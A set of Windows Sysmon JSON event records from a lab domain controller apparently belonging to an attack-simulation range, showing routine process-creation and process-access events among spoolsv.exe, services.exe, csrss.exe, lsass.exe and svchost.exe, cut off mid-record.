{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.280\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nProcessId: 2932\r\nImage: C:\\Windows\\System32\\spoolsv.exe\r\nFileVersion: 10.0.14393.3808 (rs1_release.200707-2105)\r\nDescription: Spooler SubSystem App\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: spoolsv.exe\r\nCommandLine: C:\\Windows\\System32\\spoolsv.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.280","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","Image":"C:\\Windows\\System32\\spoolsv.exe","FileVersion":"10.0.14393.3808 (rs1_release.200707-2105)","Description":"Spooler SubSystem App","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"spoolsv.exe","CommandLine":"C:\\Windows\\System32\\spoolsv.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1170,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.294\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.294","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1171,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.295\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.295","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1172,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.301\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.301","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1173,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.305\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.305","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.305\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.305","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.311\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.311","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.311\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.311","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.311\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 